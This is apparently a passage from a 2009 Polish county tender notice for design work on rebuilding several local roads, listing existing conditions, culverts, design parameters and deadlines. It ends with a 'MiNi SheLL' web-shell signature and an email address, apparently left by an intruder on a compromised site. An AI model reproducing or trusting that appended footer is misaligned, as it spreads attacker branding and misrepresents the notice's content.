2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r)
2.4	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym;
- zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych.
2.5	Inne informacje
- PZD jest na etapie uzyskiwania decyzji o środowiskowych uwarunkowaniach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Przebudowa drogi  powiatowej Nr 1654B w miejscowości Parcewo, dł. 1,655 km (początek opracowania tablica miejsc. Parcewo ,koniec opracowania tablica miejsc. Parcewo).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
2+734 - 4+389 przekrój trasowy; jezdnia bitumiczna szerokości 6,0 - 6,2 m; korona  8,0 m; miejscami występuje stary chodnik z płytki betonowej 35x35x5 cm.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy i jednostronny.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się następujące przepusty:
3+499 	przepust żelbetowy fi 80 cm, długości 11,5 m, z murkami, rury poprzesuwane, przesypuje się nasyp - do przebudowy
4+267 	przepust żelbetowy fi 60 m; długości 10,5 m z murkami, rury poprzesuwane, przesypuje się nasyp - do przebudowy
Zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych. Poprawić odwodnienia - poprzez odtworzenie rowów wg potrzeb.
1.5	Sprawy inne
Uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym (w miejscowości w pasie drogowym jest wodociąg, kanalizacja sanitarna i linia telefoniczna oraz energetyczna).
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  Z
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu wykonane pomiary ruchu
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy:
Należy przedstawić zamawiającemu do akceptacji koncepcję przebudowy mając na uwadze poprawę bezpieczeństwa ruchu kołowego i pieszego tzn:
- zaprojektować zatoki autobusowe z peronami po obu stronach jezdni
- zaprojektować parking dla samochodów osobowych przy Cerkwi i cmentarzu
- zaprojektować ciąg pieszy lub pieszo - rowerowy w miejscowości 
- rozwiązać sytuacyjnie i wysokościowo skrzyżowanie:
	- z drogą powiatową Nr 1680B do miejscowości Spiczki
	- z drogą gminną do miejscowości Hołody
- zaprojektować wzmocnienie istniejącej jezdni betonem asfaltowym..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 : Remont drogi powiatowej Nr 1654B w miejscowości Orli-ulica Bielska,dł.0,604 km
(ulica Bielska od skrzyżowania z ulicą Sienkiewicza do ulicy Mickiewicza).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona ( km roboczy )
0+000 - 0+604 przekrój uliczny jezdnia bitumiczna 7,1 - 6,0 m : obustronne chodniki z elementów betonowych.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności, równości podłużnej i poprzecznej.
1.4	Sprawy inne
Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej z drogami gminnymi.
Kopię mapy sytuacyjno- wysokościowej dostarczy Zamawiający.
Wykonawca winien wykonać przekroje poprzeczne istniejącej nawierzchni nie rzadziej niż co 20 m.
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  Z
2.2.3	Przekrój poprzeczny (normalny): przekrój uliczny.
2.3	Konstrukcja  nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu.
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy :
- należy wymienić na całym odcinku krawężnik na nowy;
- dostosować chodniki i zjazdy do nowej niwelety ,stare i połamane elementy wymienić na nowe;
- nadać spadki poprzeczne i podłużne jezdni poprzez frezowanie istniejącej nawierzchni i ewentualne ułożenie warstwy wyrównawczej
- wykonanie nakładki z betonu asfaltowego
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z podkładu geodezyjnego i przedstawić w opisie technicznym; 
- zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: Przebudowa drogi powiatowej Nr 1688B w miejscowości Piliki dł. 1,350 km (granica pasa drogowego drogi krajowej Nr 19, koniec opracowania znak D-43).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
	0+000 - 0+006 przekrój uliczny; jezdnia bitumiczna 6,6 m;
	0+006 - 1+238 przekrój uliczny; jezdnia brukowa 6,6 m;
	1+238 - 1+320 przekrój trasowy; jezdnia żwirowa  5,5 m;
Na odcinku od 0+010 km do 0+370 obustronny chodnik szerokości 1,4 m z płytki betonowej 0,35x0,35x0,005 cm.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się przepusty :
w km 0+400 2 fi 150 cm żelbetowy, długości 13,7 m z murkami
Rozwiązanie kompleksowe odwodnienia w miejscowości Piliki
Poprawa odwodnienia - odtworzenie rowów odmulenie wg potrzeb.
1.5	Sprawy inne
1. Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej Nr 1688 z drogą gminną na końcu miejscowości.
2. Od przepustu pod drogą 2 fi 150 w km 0+400 prawie do końca wsi wzdłuż nasypu są rowy lewostronne i prawostronne znajdujące się poza pasem drogowym i spełniające funkcję odwodnienia przyległych terenów. Remont (renowację) tych rowów należy ująć w odrębnym drugim opracowaniu (dokumentacja budowlana i techniczna).
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  L
2.2.3	Przekrój uliczny
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu.
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym;
- zwrócić szczególną uwagę na odprowadzenie wód powierzchniowych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5: Przebudowa drogi powiatowej Nr 1586B od drogi powiatowej Nr 1575B do miejscowości Woronie, dł. 2,2 km (początek opracowania krawędź jezdni bitumicznej drogi Nr 1575B, koniec opracowania winien obejmować skrzyżowanie z drogą gminną)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	STAN ISTNIEJĄCY
1.1	Szerokość istniejącej jezdni i korona
0+000 - 2+200 przekrój trasowy; jezdnia gruntowa ulepszona szerokości 4 m - 5 m, korona 6,2m-6,7 m, pas drogowy szerokości 9 m i 11 m.
1.2	Sytuacja trasy
Na przebudowywanym odcinku droga posiada przekrój daszkowy.
1.3	Niweleta drogi (ocena wizualna)
Niweleta drogi wymaga korekty ze względu na poprawę płynności.
1.4	Stan rowów i innych urządzeń odwadniających
Na przedmiotowym odcinku drogi znajdują się przepusty:
w km 0+005 fi 60 cm betonowy, długości 10 m bez murków
w km 1+050 fi 80 cm betonowy, długości 9 m zakończony betonowymi dokami.
1.5	Sprawy inne
Należy rozwiązać sytuacyjnie i wysokościowo skrzyżowanie drogi powiatowej Nr 1586 z drogą gminną do miejscowości Woronie.
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Wnioskowany charakter robót:  przebudowa
2.2	Wyjściowe parametry techniczne do projektowania:
2.2.1	Kategoria terenu		-  płaski
2.2.2	Klasa techniczna drogi	-  L
2.2.3	Przekrój poprzeczny(normalny):
przekrój trasowy - szerokość jezdni 5,0 m, spadki poprzeczne pobocza 6%.
2.3	Konstrukcja nawierzchni:
2.3.1	Kategoria ruchu - określona w oparciu o wykonane pomiary ruchu.
2.3.2	Nawierzchnia: zgodnie z rozporządzeniem MTiGM z dnia 02.03.1999 r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie, (Dz.U. Nr 43 z dnia 14.05.1999 r).
2.4	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
- uzbrojenie przebudowywanego odcinka drogi należy pobrać z aktualnego podkładu geodezyjnego i przedstawić w opisie technicznym;
Odtworzenie rowów wg potrzeb..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com